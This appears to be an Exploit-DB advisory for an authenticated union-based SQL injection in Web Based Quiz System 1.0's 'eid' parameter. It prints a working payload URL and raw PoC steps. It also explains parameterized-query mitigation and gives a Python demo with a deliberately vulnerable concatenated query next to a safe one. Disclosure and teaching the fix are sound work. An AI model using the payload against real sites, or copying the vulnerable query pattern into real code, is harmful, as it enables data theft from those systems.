Vendor: Web Based Quiz System
By: Deepak Kumar Bharti
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Web Based Quiz System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:web_based_quiz_system:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro
Year: 2021

Web Based Quiz System 1.0 – ‘eid’ Union Based Sql Injection (Authenticated)

A union-based SQL injection has been discovered in the Web Based Quiz System created by sourcecodester/janobe. The eid parameter of the quiz section on the Welcome page (welcome.php with q=quiz and step=2) is placed into a SQL query without being parameterized or sanitized, so an authenticated attacker can exploit it by sending a malicious payload to the vulnerable URL:

http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34

The payload closes the string literal around eid, appends a UNION SELECT with five columns (so the original query must also return five), and comments out the rest of the statement with "-- -". The author places database() in the second and third columns, which suggests those are the two positions rendered in the response. The quiz page is only reachable after logging in, which is why the issue is rated as authenticated.

Mitigation:

Use parameterized queries (prepared statements with bound parameters) for every query that takes user input; this is the fix that removes the vulnerability, because eid is then passed to the database as data rather than as part of the SQL text. Input validation is a useful second layer: eid should be checked against its expected format before it reaches the query, and rejected otherwise. Stored procedures only help if they themselves use parameters and do not assemble SQL strings from their arguments.
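The following is an added example, not code from the Web Based Quiz System or from the exploit author. The application is PHP/MySQLi, but the example uses Python with the standard-library sqlite3 module so it runs stand-alone; for the same reason the PoC's database() is swapped for sqlite_version(), and the table schema and column names are constructed (the advisory only tells us the query returns five columns). It shows, side by side, why the PoC payload hijacks a concatenated query and why the same payload is inert once eid is bound as a parameter, plus the format check suggested above. The 13-hex-character pattern used for that check is an assumption derived from the eid value in the PoC URL.

```python
import re
import sqlite3

# Exam id taken from the PoC URL, and the PoC payload with database()
# replaced by sqlite_version() because SQLite has no database() function.
LEGIT_EID = "60377db362694"
PAYLOAD = LEGIT_EID + "' UNION SELECT 1,'injected',sqlite_version(),4,5-- -"


def make_db():
    # Constructed stand-in for the quiz data. The real schema is not in the
    # advisory; the payload only tells us the query returns five columns,
    # so this table has five columns with assumed names.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE questions (id INTEGER, eid TEXT, question TEXT, "
        "answer TEXT, marks INTEGER)"
    )
    conn.execute(
        "INSERT INTO questions VALUES (1, ?, 'What is 2+2?', '4', 5)",
        (LEGIT_EID,),
    )
    return conn


def vulnerable_lookup(conn, eid):
    # The flaw: eid is spliced into the SQL text, so the closing quote, the
    # UNION SELECT and the trailing comment in PAYLOAD all become SQL.
    sql = f"SELECT * FROM questions WHERE eid = '{eid}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, eid):
    # The fix: eid travels as a bound parameter. The whole payload is
    # compared as one literal string and matches no row.
    return conn.execute(
        "SELECT * FROM questions WHERE eid = ?", (eid,)
    ).fetchall()


# Defence in depth. The eid in the PoC is 13 lowercase hex characters (the
# shape of PHP's uniqid()); treating that as the expected format is an
# assumption, not something the advisory states.
EID_RE = re.compile(r"[0-9a-f]{13}")


def is_valid_eid(eid):
    return EID_RE.fullmatch(eid) is not None


def demo():
    # Run the same payload through both code paths and return the rows.
    conn = make_db()
    return {
        "vulnerable": vulnerable_lookup(conn, PAYLOAD),  # real row + injected row
        "safe": safe_lookup(conn, PAYLOAD),              # no rows
        "legit": safe_lookup(conn, LEGIT_EID),           # the real row only
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The vulnerable path returns two rows: the genuine question and a second row whose columns two and three carry attacker-chosen values, exactly the positions the PoC fills with database(). The parameterized path returns nothing for the payload and the expected row for the genuine eid, and is_valid_eid rejects the payload before it would reach the database at all.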
Source: Exploit-DB raw data

# Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)
# Date: 04-03-2021
# Exploit Author: Deepak Kumar Bharti
# Vendor Homepage: https://www.sourcecodester.com
# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
# Software: Web Based Quiz System
# Version: 1.0

# Tested on: Windows 10 Pro
# A union-based SQL injection has been discovered in the Web Based Quiz System created by sourcecodester/janobe;
# the eid parameter in the quiz section of the Welcome page is affected by this vulnerability.
# URL: http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34

POC:
# Go to the URL http://localhost/login.php
# Log in with the default credentials
# Then go to the quiz and execute the payload, i.e.:
http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34